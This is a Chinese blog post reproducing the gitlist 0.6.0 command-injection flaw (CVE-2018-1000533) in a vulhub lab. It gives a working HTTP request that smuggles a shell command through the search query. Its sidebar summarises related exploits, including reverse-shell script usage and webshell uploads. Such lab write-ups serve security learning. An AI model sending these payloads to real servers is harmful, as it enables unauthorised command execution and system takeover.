gitlist 0.6.0 远程命令执行漏洞(CVE-2018-1000533)

最新推荐文章于 2024-06-28 13:38:38 发布
最新推荐文章于 2024-06-28 13:38:38 发布
阅读量1k 收藏 2
点赞数
分类专栏: vulhub漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/117652583
版权

漏洞原理

漏洞原理详细请看:https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533

漏洞复现

发送以下数据包,即可执行命令:

POST /example/tree/a/search HTTP/1.1
Host: your-ip:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Content-Length: 56

query=--open-files-in-pager=touch /tmp/success;

其中,访问的url,example是项目名称,需要一个已经存在的项目名称,a应该是分支的名称,同时在这里被当作$branch,作用是搜索关键字,需要有搜索结果,不然命令不会执行。
在这里插入图片描述
查看靶机
在这里插入图片描述

小 白 萝 卜
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用Vulnhub复现漏洞 - Gitlist 0.6.0 远程命令执行漏洞
JiangBuLiu的博客
07-08 790
gitlist 0.6.0 远程命令执行漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现端口拦截发送数据包: Vulnhub官方复现教程 【https://vulhub.org/#/environments/httpd/ssi-rce/】 漏洞原理 在用户对仓库中代码进行搜索的时候,gitlist将调用git grep命令: public function searchTree($q...
vulhub漏洞复现-Gitlist 0.6.0(cve-2018-1000533)远程命令执行漏洞
遇事不决冲冲冲
10-20 5195
Gitlist gitlist是一款使用PHP开发的图形化git仓库查看工具。 思路 在用户对仓库中代码进行搜索的时候,gitlist将调用git grep命令: public function searchTree($query, $branch) { if (empty($query)) { return null; } $query = escapeshellarg($query); try { $results = $this-&
gitlist 0.6.0 远程命令执行漏洞
黑白的博客
12-23 463
声明 好好学习,天天向上 漏洞描述 gitlist是一款使用PHP开发的图形化git仓库查看工具。在其0.6.0版本中,存在一处命令参数注入问题,可以导致远程命令执行漏洞。 影响范围 0.6.0 复现过程 这里使用0.6.0版本 使用vulhub /app/vulhub-master/gitlist/0.6.0-rce 使用docker启动 docker-compose build docker-compose up -d 环境启动后,访问 http://192.168.239.129:8080 发送
[春秋云镜]CVE-2018-1000533
niubi707的博客
12-01 5611
gitlist是一款使用PHP开发的图形化git仓库查看工具。在其0.6.0版本中,存在一处命令参数注入问题,可以导致远程命令执行漏洞
【春秋云镜】CVE-2018-1000533
2301_78321656的博客
07-15 1935
gitlist是一款使用PHP开发的图形化git仓库查看工具。在其0.6.0版本中,存在一处命令参数注入问题,可以导致远程命令执行漏洞。可以用蚁剑连接一句话木马执行其他操作,这里要获取flag,所以直接执行命令获取flag。春秋云镜中的漏洞靶标,CVE编号为CVE-2018-1000533。根据cve并用burpsuite抓取数据包,并放到重放器中。修改数据包,写入一句话木马到网站目录中。访问漏洞环境,寻找可利用的点。
春秋云镜 CVE-2018-1000533
qq_22002773的博客
09-06 146
春秋云镜 CVE-2018-1000533
einops-0.6.0-py3-none-any.whl
04-27
该资源为einops-0.6.0-py3-none-any.whl,欢迎下载使用哦!
flax-0.6.0-py3-none-any.whl
12-16
该资源为flax-0.6.0-py3-none-any.whl,欢迎下载使用哦!
Python库 | pyotr-0.6.0-py3-none-any.whl
02-18
python库,解压后可用。 资源全名:pyotr-0.6.0-py3-none-any.whl
Python库 | datacaster-0.6.0-py3-none-any.whl
02-26
python库。 资源全名:datacaster-0.6.0-py3-none-any.whl
CVE-2018-2893:可以直接反弹shell
04-28
CVE-2018-2893 可以直接反弹shell Usage 监听 nc -lvvp reverse_port 发送payload python weblogic.py target_host target_port reverse_host reverse_port Reffer 说明 仅用于测试和交流学习,勿作他用
schedule-0.6.0-py2.py3-none-any.whl
11-01
An in-process scheduler for periodic jobs that uses the builder pattern for configuration. Schedule lets you run Python functions (or any other callable) periodically at pre-determined intervals using...
GitLab远程代码执行漏洞风险提示(CVE-2022-2185)
qzt961003的博客
07-05 3899
近日, GitLab 官方发布了安全公告,修复了 GitLab 社区版(CE)和企业版(EE)中的一个远程代码执行漏洞CVE-2022-2185),CVSS 评分 9.9,该漏洞源于授权用户可以导入恶意制作的项目导致远程代码执行,成功利用此漏洞的攻击者可获得服务器权限。目前官方已发布安全版本,建议受影响的用户尽快采取安全措施。...
GitLab远程代码执行漏洞(CVE-2022-2992)处理
x10n9的博客
09-08 1825
漏洞存在是由于未对GitHub中导入的API端点请求数据进行校验。经过身份认证的远程攻击者可通过发送特制的请求包最终在目标机器上执行任意代码。可以通过禁用 GitHub 导入来缓解。5.确认“GitHub”没有作为导入选项出现。4.在“导入源”下禁用“GitHub”选项。1.在浏览器窗口中,以任何用户身份登录。3.展开“可见性和访问控制”选项卡。1.点击“菜单”->“管理”。2.点击“设置”->“常规”。3.点击“新建项目/存储库”。2.点击顶部栏上的“+”。5.点击“保存更改”。4.点击“导入项目”。
vulhub漏洞复现二十_GitList
weixin_44193247的博客
01-30 977
vulhub漏洞复现练习篇
CVE-2018-9995漏洞复现
qq_39627497的博客
12-06 2948
DVR,全称为Digital Video Recorder(硬盘录像机),即数字视频录像机,相对于传统的模拟摄像录像机,采用硬盘录像,故常常被称为硬盘录像机,也被称为DVR。它是一套进行图像计算存储处理的计算机系统,具有对图像/语音和动态帧等进行长时间录像、录音、远程监视和控制的功能,DVR集合了录像机、画面分割器、云台镜头控制、报警控制、网络传输等五种功能于一身,用一台设备就能取代模拟监控系统一...
cve-2018-3191简析
一个安全研究员
05-27 1843
如题
CVE-2017-8464远程命令执行漏洞(震网漏洞)复现
qq_39627497的博客
12-06 1478
1、 漏洞描述 攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。 当用户在Windows资源管理器或解析.LNK文件的任何其他应用程序中打开此驱动器(或远程共享)时,恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。 注释:.LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。 2、 ...
港口危险货物安全管理人员考试题库(含答案)
最新发布
m0_66937659的博客
06-28 392
9.《消防法》第四十条规定:公众聚集的场所未经消防安全检查或者经检查不合格,擅自使用或者开业的,责令限期改正逾期不改正的,责令停止施工、停止使用或者停产停业( )。11.机关、团体、企业、事业等单位以及村民委员会,居民委员会根据需要,建立志愿消防队等多种形式的( ),开展群众性自防自救工作。B、安全生产管理制度和操作规程的完善有效性,事故应急预案的科学性、可操作性、有效性。D、安全生产管理制度和操作规程的完善有效性,事故应急预案的针对性、可操作性、有效性。4.液化石油气属于( )。
android 编译jsoncpp-src-0.6.0-rc2
12-12
编译jsoncpp-src-0.6.0-rc2可以通过以下步骤: 1. 首先,从jsoncpp官方网站上下载jsoncpp-src-0.6.0-rc2的压缩包,并解压到本地目录。 2. 确保你的电脑上已经安装了Android NDK,如果没有安装,需要先下载并安装Android NDK。 3. 使用命令行工具,进入到jsoncpp-src-0.6.0-rc2所在的目录中。 4. 创建一个build的目录,并进入该目录。 5. 在build目录下执行以下命令: ``` cmake -DCMAKE_TOOLCHAIN_FILE=/path/to/your/ndk/build/cmake/android.toolchain.cmake -DANDROID_ABI=armeabi-v7a .. ``` 这个命令会使用cmake工具生成Android平台上的编译配置。 6. 然后执行以下命令进行编译: ``` make ``` 7. 编译完成后,在build目录下会生成jsoncpp的静态库文件(libjsoncpp.a)。 8. 最后,将生成的静态库文件拷贝到你的Android项目中,并在Android.mk文件中添加对jsoncpp的引用。 以上就是编译jsoncpp-src-0.6.0-rc2的步骤,通过这些步骤可以成功在Android平台上使用jsoncpp库。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值